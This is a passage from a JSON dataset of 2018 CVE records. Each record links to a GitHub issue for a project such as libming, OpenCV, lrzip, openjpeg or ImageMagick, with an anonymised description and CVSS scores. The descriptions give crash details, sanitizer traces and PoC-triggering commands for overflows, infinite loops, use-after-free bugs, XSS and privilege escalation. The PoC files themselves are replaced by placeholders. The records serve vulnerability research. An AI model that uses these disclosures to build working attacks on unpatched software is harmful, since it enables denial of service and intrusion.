  31264. "impactScore": 5.9,
  31265. "exploitabilityScore": 2.8
  31266. },
  31267. {
  31268. "CVE_ID": "CVE-2018-5251",
  31269. "Issue_Url_old": "https://github.com/libming/libming/issues/97",
  31270. "Issue_Url_new": "https://github.com/libming/libming/issues/97",
  31271. "Repo_new": "libming/libming",
  31272. "Issue_Created_At": "2018-01-04T04:40:44Z",
  31273. "description": "left shift of a negative value in APITAG (util/read.c). on NUMBERTAG the latest version): there is a left shift of a negative value in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: shift exponent NUMBERTAG is negative To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
  31274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31275. "severity": "MEDIUM",
  31276. "baseScore": 6.5,
  31277. "impactScore": 3.6,
  31278. "exploitabilityScore": 2.8
  31279. },
  31280. {
  31281. "CVE_ID": "CVE-2018-5252",
  31282. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/34",
  31283. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/34",
  31284. "Repo_new": "jsummers/imageworsener",
  31285. "Issue_Created_At": "2018-01-04T05:58:02Z",
  31286. "description": "infinite loop in get_raw_sample_int . APITAG version NUMBERTAG Copyright NUMBERTAG Jason Summers Features NUMBERTAG bit Uses libjpeg version NUMBERTAG d Uses libpng version NUMBERTAG Uses zlib version NUMBERTAG imagew @ MENTIONTAG /tmp/out outfmt bmp CODETAG testcase: URLTAG",
  31287. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31288. "severity": "MEDIUM",
  31289. "baseScore": 5.3,
  31290. "impactScore": 3.6,
  31291. "exploitabilityScore": 1.6
  31292. },
  31293. {
  31294. "CVE_ID": "CVE-2018-5253",
  31295. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/233",
  31296. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/233",
  31297. "Repo_new": "axiomatic-systems/bento4",
  31298. "Issue_Created_At": "2018-01-04T12:48:08Z",
  31299. "description": "Infinite loop in APITAG MP4 To AAC File Converter Version NUMBERTAG APITAG Version NUMBERTAG c NUMBERTAG Axiomatic Systems, LLC ./mp NUMBERTAG aac @ MENTIONTAG ./out.aac ERRORTAG APITAG if size not zero Infinite loop CODETAG testcase: URLTAG",
  31300. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31301. "severity": "HIGH",
  31302. "baseScore": 7.8,
  31303. "impactScore": 5.9,
  31304. "exploitabilityScore": 1.8
  31305. },
  31306. {
  31307. "CVE_ID": "CVE-2018-5268",
  31308. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10541",
  31309. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10541",
  31310. "Repo_new": "opencv/opencv",
  31311. "Issue_Created_At": "2018-01-07T13:02:37Z",
  31312. "description": "A heap based buffer overflow happens in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description A heap based buffer overflow happens in function APITAG in APITAG The crash details as follows: APITAG ERRORTAG APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  31313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31314. "severity": "MEDIUM",
  31315. "baseScore": 5.5,
  31316. "impactScore": 3.6,
  31317. "exploitabilityScore": 1.8
  31318. },
  31319. {
  31320. "CVE_ID": "CVE-2018-5269",
  31321. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10540",
  31322. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10540",
  31323. "Repo_new": "opencv/opencv",
  31324. "Issue_Created_At": "2018-01-07T12:58:35Z",
  31325. "description": "Assertion failure happens in bitstrm.cpp because of an incorrect integer cast. System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => clang++ Compiled executable NUMBERTAG bits Detailed description An assertion failure is triggered when parsing a crafted image file in function APITAG in file APITAG This assertion failure happens because of an incorrect cast from a NUMBERTAG bit integer to a NUMBERTAG bit integer. The crash details are as follows: APITAG opencv_afl test: PATHTAG void APITAG Assertion APITAG && pos NUMBERTAG failed. Aborted (core dumped) APITAG Steps to reproduce Please refer to the following url for the testcases: URLTAG",
  31326. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31327. "severity": "MEDIUM",
  31328. "baseScore": 5.5,
  31329. "impactScore": 3.6,
  31330. "exploitabilityScore": 1.8
  31331. },
  31332. {
  31333. "CVE_ID": "CVE-2018-5294",
  31334. "Issue_Url_old": "https://github.com/libming/libming/issues/98",
  31335. "Issue_Url_new": "https://github.com/libming/libming/issues/98",
  31336. "Repo_new": "libming/libming",
  31337. "Issue_Created_At": "2018-01-05T20:26:52Z",
  31338. "description": "integer overflow caused by out of range left shift in APITAG (util/read.c). on NUMBERTAG the latest version): there is an out-of-range left shift in the APITAG function (util/read.c), which can cause denial of service via a crafted swf file. PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' To reproduce the issue, compile libming with UBSAN \" fsanitize=undefined\", then execute: listswf $POC The POC file can be downloaded from: FILETAG",
  31339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31340. "severity": "MEDIUM",
  31341. "baseScore": 6.5,
  31342. "impactScore": 3.6,
  31343. "exploitabilityScore": 2.8
  31344. },
  31345. {
  31346. "CVE_ID": "CVE-2018-5357",
  31347. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/941",
  31348. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/941",
  31349. "Repo_new": "imagemagick/imagemagick",
  31350. "Issue_Created_At": "2018-01-11T02:55:39Z",
  31351. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick convert poc /dev/null convert: unable to open image PATHTAG No such file or directory @ PATHTAG convert: no images defined PATHTAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2ccd NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG be2cf NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG bda NUMBERTAG c in APITAG PATHTAG NUMBERTAG f NUMBERTAG bdbaeefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG bb9eef NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31353. "severity": "MEDIUM",
  31354. "baseScore": 6.5,
  31355. "impactScore": 3.6,
  31356. "exploitabilityScore": 2.8
  31357. },
  31358. {
  31359. "CVE_ID": "CVE-2018-5358",
  31360. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/939",
  31361. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/939",
  31362. "Repo_new": "imagemagick/imagemagick",
  31363. "Issue_Created_At": "2018-01-11T02:01:40Z",
  31364. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage json.psd FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f6d NUMBERTAG fb6fd in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG ff NUMBERTAG c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e5d NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG e NUMBERTAG c6f in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG acd NUMBERTAG in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG da NUMBERTAG d in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG d1 in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG b NUMBERTAG b in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG dc5c in APITAG PATHTAG NUMBERTAG f6d NUMBERTAG eefd in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f6d NUMBERTAG fcef NUMBERTAG in __libc_start_main PATHTAG FILETAG",
  31365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31366. "severity": "MEDIUM",
  31367. "baseScore": 6.5,
  31368. "impactScore": 3.6,
  31369. "exploitabilityScore": 2.8
  31370. },
  31371. {
  31372. "CVE_ID": "CVE-2018-5650",
  31373. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/88",
  31374. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/88",
  31375. "Repo_new": "ckolivas/lrzip",
  31376. "Issue_Created_At": "2018-01-12T15:44:59Z",
  31377. "description": "Infinite Loop Vulnerability in unzip_match function (src/runzip.c). on NUMBERTAG the latest version): there is an infinite loop and application hang in the unzip_match function (src/runzip.c), which can be triggered by the POC with command lrzip t $POC Looking into the unzip_match function (src/runzip.c), we found that in the while loop (line NUMBERTAG the \"offset\" could be manipulated by a crafted lrz file (line NUMBERTAG When offset is set to zero, n will always be zero (line NUMBERTAG which in turn means len is never decremented and stays non-zero, so the loop never terminates. The code segment is NUMBERTAG static i NUMBERTAG read_fdhist(rzip_control control, void buf, i NUMBERTAG len NUMBERTAG offset = read_vchars(control, ss NUMBERTAG chunk_bytes NUMBERTAG while (len NUMBERTAG n = MIN(len, offset NUMBERTAG len = n NUMBERTAG off_buf += n NUMBERTAG total += n NUMBERTAG POC: FILETAG The gdb backtrace is as follows: (gdb) bt NUMBERTAG in md5_process_bytes NUMBERTAG e NUMBERTAG in unzip_match NUMBERTAG ae4 in runzip_chunk NUMBERTAG a3 in runzip_fd NUMBERTAG in decompress_file NUMBERTAG d0f4 in main ()",
  31378. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31379. "severity": "MEDIUM",
  31380. "baseScore": 5.5,
  31381. "impactScore": 3.6,
  31382. "exploitabilityScore": 1.8
  31383. },
  31384. {
  31385. "CVE_ID": "CVE-2018-5698",
  31386. "Issue_Url_old": "https://github.com/WizardMac/ReadStat/issues/108",
  31387. "Issue_Url_new": "https://github.com/wizardmac/readstat/issues/108",
  31388. "Repo_new": "wizardmac/readstat",
  31389. "Issue_Created_At": "2018-01-11T02:48:57Z",
  31390. "description": "Heap overflow in APITAG APITAG version NUMBERTAG prerelease Ubuntu NUMBERTAG git log CODETAG ./readstat ./heap buffer overflow.dta NUMBERTAG sav ERRORTAG",
  31391. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31392. "severity": "HIGH",
  31393. "baseScore": 7.8,
  31394. "impactScore": 5.9,
  31395. "exploitabilityScore": 1.8
  31396. },
  31397. {
  31398. "CVE_ID": "CVE-2018-5706",
  31399. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4167",
  31400. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4167",
  31401. "Repo_new": "octopusdeploy/issues",
  31402. "Issue_Created_At": "2018-01-16T01:34:00Z",
  31403. "description": "Block team editing when the user tries to escalate privileges. A user with APITAG permissions, but not Administer System permissions, can edit a team to add the System Administrator role to their team, or add themselves to the System Administrator team. Also, a user with APITAG permissions, but not Administer System permissions, can edit their own user roles to include Administer System.",
  31404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31405. "severity": "HIGH",
  31406. "baseScore": 8.8,
  31407. "impactScore": 5.9,
  31408. "exploitabilityScore": 2.8
  31409. },
  31410. {
  31411. "CVE_ID": "CVE-2018-5727",
  31412. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1053",
  31413. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1053",
  31414. "Repo_new": "uclouvain/openjpeg",
  31415. "Issue_Created_At": "2018-01-13T05:29:20Z",
  31416. "description": "Integer overflow in opj_t1_encode_cblks ( PATHTAG ). APITAG problem is discovered when UBSAN is enabled) on openjpeg NUMBERTAG latest version): there is an integer overflow in the opj_t1_encode_cblks function ( PATHTAG ), which can be triggered by the POC. POC address: FILETAG Command: opj_compress n NUMBERTAG i $POC o /tmp/null.j2k PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
  31417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31418. "severity": "MEDIUM",
  31419. "baseScore": 6.5,
  31420. "impactScore": 3.6,
  31421. "exploitabilityScore": 2.8
  31422. },
  31423. {
  31424. "CVE_ID": "CVE-2018-5747",
  31425. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/90",
  31426. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/90",
  31427. "Repo_new": "ckolivas/lrzip",
  31428. "Issue_Created_At": "2018-01-17T16:11:56Z",
  31429. "description": "use after free in ucompthread (src/stream.c). on NUMBERTAG the latest version) and the latest master branch: there is a use after free problem in the ucompthread function (src/stream.c) that causes the program to crash, which can be triggered by the POC with command lrzip t $POC POC: FILETAG The problem happens in line NUMBERTAG of stream.c file. Once \"ucthread\" is released, \"uci\" is related with a random address, which causes segmentation fault NUMBERTAG uci = &ucthread[i NUMBERTAG retry NUMBERTAG if (uci >c_type != CTYPE_NONE NUMBERTAG switch (uci >c_type NUMBERTAG case CTYPE_LZMA: PATHTAG t PATHTAG Decompressing... ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. chunk_bytes NUMBERTAG is invalid in runzip_chunk Fatal error exiting APITAG ASAN:SIGSEG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG d NUMBERTAG ebc0 at pc NUMBERTAG e NUMBERTAG bp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG sp NUMBERTAG fdc NUMBERTAG f9d NUMBERTAG ASAN:SIGSEGV APITAG while reporting a bug found another one. Ignoring. APITAG while reporting a bug found another one. Ignoring. 
READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG ebc0 thread T NUMBERTAG e NUMBERTAG in ucompthread PATHTAG NUMBERTAG fdc8a NUMBERTAG ce NUMBERTAG in start_thread APITAG NUMBERTAG fdc NUMBERTAG a NUMBERTAG c in __clone APITAG NUMBERTAG d NUMBERTAG ebc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fdc8ae NUMBERTAG e NUMBERTAG in __interceptor_free PATHTAG NUMBERTAG in close_stream_in PATHTAG previously allocated by thread T0 here NUMBERTAG fdc8ae NUMBERTAG in __interceptor_calloc PATHTAG NUMBERTAG d in open_stream_in PATHTAG Thread T7 created by T0 here NUMBERTAG fdc8ae NUMBERTAG b4 in __interceptor_pthread_create PATHTAG NUMBERTAG e5cc in create_pthread PATHTAG SUMMARY: APITAG heap use after free PATHTAG ucompthread Shadow bytes around the buggy address NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbd NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c3a7fffbdc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 
Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING APITAG",
  31430. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31431. "severity": "MEDIUM",
  31432. "baseScore": 5.5,
  31433. "impactScore": 3.6,
  31434. "exploitabilityScore": 1.8
  31435. },
  31436. {
  31437. "CVE_ID": "CVE-2018-5772",
  31438. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/216",
  31439. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/216",
  31440. "Repo_new": "exiv2/exiv2",
  31441. "Issue_Created_At": "2018-01-18T05:42:05Z",
  31442. "description": "Segmentation fault caused by uncontrolled recursion of APITAG APITAG On latest version of exi NUMBERTAG and the latest master branch: there is a segmentation fault caused by uncontrolled recursion of APITAG function in src/image.cpp file, which could cause a denial of service via a crafted tif file. This issue could be reproduced by command: exi NUMBERTAG POC. POC is available at: FILETAG The stack trace is as follows: APITAG of APITAG call... at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9d6c2 in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG start NUMBERTAG APITAG c NUMBERTAG M', depth NUMBERTAG at PATHTAG NUMBERTAG ffff7b9df NUMBERTAG in APITAG (this NUMBERTAG b0, io=..., out=..., APITAG depth NUMBERTAG offset NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG b in APITAG (this NUMBERTAG b0, out=..., APITAG depth NUMBERTAG at PATHTAG NUMBERTAG ffff7be NUMBERTAG in APITAG (this NUMBERTAG b0) at PATHTAG NUMBERTAG adde in APITAG (this NUMBERTAG at PATHTAG NUMBERTAG a9b3 in APITAG (this NUMBERTAG path=...) at PATHTAG NUMBERTAG bfb9 in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
  31443. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31444. "severity": "MEDIUM",
  31445. "baseScore": 5.5,
  31446. "impactScore": 3.6,
  31447. "exploitabilityScore": 1.8
  31448. },
  31449. {
  31450. "CVE_ID": "CVE-2018-5773",
  31451. "Issue_Url_old": "https://github.com/trentm/python-markdown2/issues/285",
  31452. "Issue_Url_new": "https://github.com/trentm/python-markdown2/issues/285",
  31453. "Repo_new": "trentm/python-markdown2",
  31454. "Issue_Created_At": "2018-01-18T06:06:04Z",
  31455. "description": "Possible XSS in safe_mode using incomplete tags. APITAG with latest version: ERRORTAG using APITAG : ERRORTAG I think it will be a better approach to encode the incomplete tags as well to prevent it. URLTAG",
  31456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31457. "severity": "MEDIUM",
  31458. "baseScore": 6.1,
  31459. "impactScore": 2.7,
  31460. "exploitabilityScore": 2.8
  31461. },
  31462. {
  31463. "CVE_ID": "CVE-2018-5773",
  31464. "Issue_Url_old": "https://github.com/google/osv/issues/430",
  31465. "Issue_Url_new": "https://github.com/google/osv.dev/issues/430",
  31466. "Repo_new": "google/osv.dev",
  31467. "Issue_Created_At": "2022-05-18T14:37:27Z",
  31468. "description": "APITAG Data quality issue for APITAG . MENTIONTAG reported this upstream to APITAG : APITAG Produces: CODETAG But APITAG isn't valid for APITAG (it's only valid for APITAG ): URLTAG It looks like OSV has both APITAG and its CVE alias, but with a missing \"version fixed\" for the GHSA version: URLTAG cc MENTIONTAG as well for visibility.",
  31469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31470. "severity": "MEDIUM",
  31471. "baseScore": 6.1,
  31472. "impactScore": 2.7,
  31473. "exploitabilityScore": 2.8
  31474. },
  31475. {
  31476. "CVE_ID": "CVE-2018-5785",
  31477. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1057",
  31478. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1057",
  31479. "Repo_new": "uclouvain/openjpeg",
  31480. "Issue_Created_At": "2018-01-19T02:36:38Z",
  31481. "description": "Out of bound left shift in opj_j2k_setup_encoder ( PATHTAG ). APITAG problem is discovered with UBSAN enabled) On latest version NUMBERTAG and master branch of openjpeg: there is an integer overflow caused by out of bound left shift in opj_j2k_setup_encoder function ( PATHTAG ), which could cause denial of service via a crafted bmp file. PATHTAG runtime error: shift exponent NUMBERTAG is too large for NUMBERTAG bit type 'int' To reproduce this issue, run: bin/opj_compress n NUMBERTAG i $POC o OUTPUT The POC could be downloaded at: FILETAG",
  31482. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31483. "severity": "MEDIUM",
  31484. "baseScore": 6.5,
  31485. "impactScore": 3.6,
  31486. "exploitabilityScore": 2.8
  31487. },
  31488. {
  31489. "CVE_ID": "CVE-2018-5786",
  31490. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/91",
  31491. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/91",
  31492. "Repo_new": "ckolivas/lrzip",
  31493. "Issue_Created_At": "2018-01-19T05:20:03Z",
  31494. "description": "Infinite Loop Vulnerability in get_fileinfo (src/lrzip.c). On latest version NUMBERTAG and the master branch, there is an infinite loop and application hang in the get_fileinfo function (src/lrzip.c), which can be triggered by the POC with command: lrzip i $POC Looking into the get_fileinfo function (src/lrzip.c), we found that: in the \"do {} while(last_head)\" loop, the \"last_head\" variable is affected by the POC file and always non zero, and \"lseek\" in line NUMBERTAG continuously moves file cursor to the same position. That means, \"last_head\" is always assigned the value from the same file position, resulting in infinite loop NUMBERTAG bool get_fileinfo(rzip_control control NUMBERTAG do NUMBERTAG if (unlikely(head_off = lseek(fd_in, last_head + ofs, SEEK_SET NUMBERTAG APITAG to seek to header data in get_fileinfo \"), error NUMBERTAG if APITAG fd_in, &ctype, &c_len, &u_len NUMBERTAG last_head, chunk_byte NUMBERTAG return false NUMBERTAG while (last_head); POC: FILETAG",
  31495. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31496. "severity": "MEDIUM",
  31497. "baseScore": 5.5,
  31498. "impactScore": 3.6,
  31499. "exploitabilityScore": 1.8
  31500. },
  31501. {
  31502. "CVE_ID": "CVE-2018-5968",
  31503. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1899",
  31504. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1899",
  31505. "Repo_new": "fasterxml/jackson-databind",
  31506. "Issue_Created_At": "2018-01-18T11:24:26Z",
  31507. "description": "Another two gadgets to exploit default typing issue in jackson. Hi, there. Recently, I found that there are two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to APITAG . Cheers!",
  31508. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31509. "severity": "HIGH",
  31510. "baseScore": 8.1,
  31511. "impactScore": 5.9,
  31512. "exploitabilityScore": 2.2
  31513. },
  31514. {
  31515. "CVE_ID": "CVE-2018-6010",
  31516. "Issue_Url_old": "https://github.com/yiisoft/yii2/issues/14711",
  31517. "Issue_Url_new": "https://github.com/yiisoft/yii2/issues/14711",
  31518. "Repo_new": "yiisoft/yii2",
  31519. "Issue_Created_At": "2017-08-23T16:09:01Z",
  31520. "description": "Exceptions on AJAX requests display sensitive information. What steps will reproduce the problem? Throw an exception anywhere in your code, make sure that APITAG is off and that you do not have a custom error action ( ERRORTAG ) configured: ERRORTAG Now make an AJAX request to the page that throws the exception and make sure that the response format is set to APITAG . What is the expected result? Response text: ERRORTAG What do you get instead? Response text: ERRORTAG Additional info | Q | A | | | Yii version NUMBERTAG PHP version NUMBERTAG Operating system | Linux I haven't had a chance to test this with the newest Yii2 version but checked the code inside ERRORTAG quickly and it looks like it will lead to the same problem.",
  31521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31522. "severity": "HIGH",
  31523. "baseScore": 7.5,
  31524. "impactScore": 3.6,
  31525. "exploitabilityScore": 3.9
  31526. },
  31527. {
  31528. "CVE_ID": "CVE-2018-6193",
  31529. "Issue_Url_old": "https://github.com/sshipway/routers2/issues/1",
  31530. "Issue_Url_new": "https://github.com/sshipway/routers2/issues/1",
  31531. "Repo_new": "sshipway/routers2",
  31532. "Issue_Created_At": "2018-01-18T21:49:55Z",
  31533. "description": "XSS rtr param. During a security test I found that routers2.cgi has a Cross Site Scripting (XSS) vulnerability, affecting the rtr GET parameter in the request below. This may enable attackers to inject malicious scripts into client browser. APITAG XSS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG SS Evidence NUMBERTAG FILETAG \"XSS Evidence NUMBERTAG Cause: [ APITAG URLTAG All the params returned in the HTML should be escaped.",
  31534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  31535. "severity": "MEDIUM",
  31536. "baseScore": 4.7,
  31537. "impactScore": 2.7,
  31538. "exploitabilityScore": 1.6
  31539. },
  31540. {
  31541. "CVE_ID": "CVE-2018-6196",
  31542. "Issue_Url_old": "https://github.com/tats/w3m/issues/88",
  31543. "Issue_Url_new": "https://github.com/tats/w3m/issues/88",
  31544. "Repo_new": "tats/w3m",
  31545. "Issue_Created_At": "2017-01-22T05:16:33Z",
  31546. "description": "infinite recursion in APITAG input ( APITAG ) CODETAG how to reproduce: APITAG",
  31547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31548. "severity": "HIGH",
  31549. "baseScore": 7.5,
  31550. "impactScore": 3.6,
  31551. "exploitabilityScore": 3.9
  31552. },
  31553. {
  31554. "CVE_ID": "CVE-2018-6197",
  31555. "Issue_Url_old": "https://github.com/tats/w3m/issues/89",
  31556. "Issue_Url_new": "https://github.com/tats/w3m/issues/89",
  31557. "Repo_new": "tats/w3m",
  31558. "Issue_Created_At": "2017-02-14T04:58:05Z",
  31559. "description": "segv in APITAG input ( APITAG ) CODETAG how to reproduce: ERRORTAG stderr: ERRORTAG More detail to reproduce please see URLTAG For your convenience, gdbline: APITAG gdb args ./w3m APITAG T text/html dump cases/tats w3m NUMBERTAG found by afl fuzz",
  31560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31561. "severity": "HIGH",
  31562. "baseScore": 7.5,
  31563. "impactScore": 3.6,
  31564. "exploitabilityScore": 3.9
  31565. },
  31566. {
  31567. "CVE_ID": "CVE-2018-6307",
  31568. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/241",
  31569. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/241",
  31570. "Repo_new": "libvnc/libvncserver",
  31571. "Issue_Created_At": "2018-08-14T15:11:45Z",
  31572. "description": "SECURITY: Heap use after free in tightvnc filetransfer extension. Since security issues have been already reported to this repository and I didn't manage to find any other information about reporting vulnerabilities, I feel that it is okay to report this issue here. In PATHTAG function APITAG contains the following code : ERRORTAG This vulnerability requires the tight file transfer extension to be enabled. APITAG function calls APITAG extension destructor routine which APITAG extension data, in this case APITAG rtcp variable. rtcp is later used as argument to ERRORTAG function, which results in a use after free. Asan report: ERRORTAG This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
  31573. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31574. "severity": "HIGH",
  31575. "baseScore": 8.1,
